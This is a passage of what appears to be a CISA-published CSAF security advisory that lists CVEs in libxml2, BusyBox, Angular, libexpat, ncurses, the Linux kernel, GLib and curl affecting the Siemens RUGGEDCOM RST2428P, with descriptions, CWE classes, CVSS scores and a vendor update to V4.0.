<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-49796</a></h3>
<div class="csaf-accordion-content">
<p>A vulnerability was found in libxml2. Processing certain sch:name elements from the input XML file can trigger a memory corruption issue. This flaw allows an attacker to craft a malicious XML input file that can lead libxml to crash, resulting in a denial of service or other possible undefined behavior due to sensitive data being corrupted in memory.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-49796">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/125.html">CWE-125 Out-of-bounds Read</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>9.1</td>
<td>CRITICAL</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-60876</a></h3>
<div class="csaf-accordion-content">
<p>BusyBox wget thru 1.3.7 accepted raw CR (0x0D)/LF (0x0A) and other C0 control bytes in the HTTP request-target (path/query), allowing the request line to be split and attacker-controlled headers to be injected. To preserve the HTTP/1.1 request-line shape METHOD SP request-target SP HTTP/1.1, a raw space (0x20) in the request-target must also be rejected (clients should use %20).</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-60876">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/284.html">CWE-284 Improper Access Control</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>6.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-66035</a></h3>
<div class="csaf-accordion-content">
<p>Angular is a development platform for building mobile and desktop web applications using TypeScript/JavaScript and other languages. Prior to versions 19.2.16, 20.3.14, and 21.0.1, there is a XSRF token leakage via protocol-relative URLs in angular HTTP clients. The vulnerability is a Credential Leak by App Logic that leads to the unauthorized disclosure of the Cross-Site Request Forgery (XSRF) token to an attacker-controlled domain. Angular's HttpClient has a built-in XSRF protection mechanism that works by checking if a request URL starts with a protocol (http:// or https://) to determine if it is cross-origin. If the URL starts with protocol-relative URL (//), it is incorrectly treated as a same-origin request, and the XSRF token is automatically added to the X-XSRF-TOKEN header. This issue has been patched in versions 19.2.16, 20.3.14, and 21.0.1. A workaround for this issue involves avoiding using protocol-relative URLs (URLs starting with //) in HttpClient requests. All backend communication URLs should be hardcoded as relative paths (starting with a single /) or fully qualified, trusted absolute URLs.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-66035">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/201.html">CWE-201 Insertion of Sensitive Information Into Sent Data</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8.6</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-66382</a></h3>
<div class="csaf-accordion-content">
<p>In libexpat through 2.7.3, a crafted file with an approximate size of 2 MiB can lead to dozens of seconds of processing time.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-66382">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/407.html">CWE-407 Inefficient Algorithmic Complexity</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>2.9</td>
<td>LOW</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L">CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-66412</a></h3>
<div class="csaf-accordion-content">
<p>Angular is a development platform for building mobile and desktop web applications using TypeScript/JavaScript and other languages. Prior to 21.0.2, 20.3.15, and 19.2.17, A Stored Cross-Site Scripting (XSS) vulnerability has been identified in the Angular Template Compiler. It occurs because the compiler's internal security schema is incomplete, allowing attackers to bypass Angular's built-in security sanitization. Specifically, the schema fails to classify certain URL-holding attributes (e.g., those that could contain javascript: URLs) as requiring strict URL security, enabling the injection of malicious scripts. This vulnerability is fixed in 21.0.2, 20.3.15, and 19.2.17.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-66412">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/79.html">CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-69720</a></h3>
<div class="csaf-accordion-content">
<p>The infocmp command-line tool in ncurses before 6.5-20251213 has a stack-based buffer overflow in analyze_string in progs/infocmp.c.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-69720">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/121.html">CWE-121 Stack-based Buffer Overflow</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.3</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:L">CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:L</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-71185</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: dmaengine: ti: dma-crossbar: fix device leak on am335x route allocation Make sure to drop the reference taken when looking up the crossbar platform device during am335x route allocation.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-71185">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-71186</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: dmaengine: stm32: dmamux: fix device leak on route allocation Make sure to drop the reference taken when looking up the DMA mux platform device during route allocation. Note that holding a reference to a device does not prevent its driver data from going away so there is no point in keeping the reference.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-71186">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-71188</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: dmaengine: lpc18xx-dmamux: fix device leak on route allocation Make sure to drop the reference taken when looking up the DMA mux platform device during route allocation. Note that holding a reference to a device does not prevent its driver data from going away so there is no point in keeping the reference.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-71188">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-71189</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: dmaengine: dw: dmamux: fix OF node leak on route allocation failure Make sure to drop the reference taken to the DMA master OF node also on late route allocation failures.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-71189">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-71190</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: dmaengine: bcm-sba-raid: fix device leak on probe Make sure to drop the reference taken when looking up the mailbox device during probe on probe failures and on driver unbind.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-71190">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-71191</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: dmaengine: at_hdmac: fix device leak on of_dma_xlate() Make sure to drop the reference taken when looking up the DMA platform device during of_dma_xlate() when releasing channel resources. Note that commit 3832b78b3ec2 ("dmaengine: at_hdmac: add missing put_device() call in at_dma_xlate()") fixed the leak in a couple of error paths but the reference is still leaking on successful allocation.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-71191">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-1484</a></h3>
<div class="csaf-accordion-content">
<p>A flaw was found in the GLib Base64 encoding routine when processing very large input data. Due to incorrect use of integer types during length calculation, the library may miscalculate buffer boundaries. This can cause memory writes outside the allocated buffer. Applications that process untrusted or extremely large Base64 input using GLib may crash or behave unpredictably.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-1484">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/787.html">CWE-787 Out-of-bounds Write</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>4.2</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:L">CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:L</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-1489</a></h3>
<div class="csaf-accordion-content">
<p>A flaw was found in GLib. An integer overflow vulnerability in its Unicode case conversion implementation can lead to memory corruption. By processing specially crafted and extremely large Unicode strings, an attacker could trigger an undersized memory allocation, resulting in out-of-bounds writes. This could cause applications utilizing GLib for string conversion to crash or become unstable.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-1489">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/787.html">CWE-787 Out-of-bounds Write</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.4</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L">CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-3784</a></h3>
<div class="csaf-accordion-content">
<p>curl would wrongly reuse an existing HTTP proxy connection doing CONNECT to a server, even if the new request uses different credentials for the HTTP proxy. The proper behavior is to create or use a separate connection.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-3784">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/305.html">CWE-305 Authentication Bypass by Primary Weakness</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
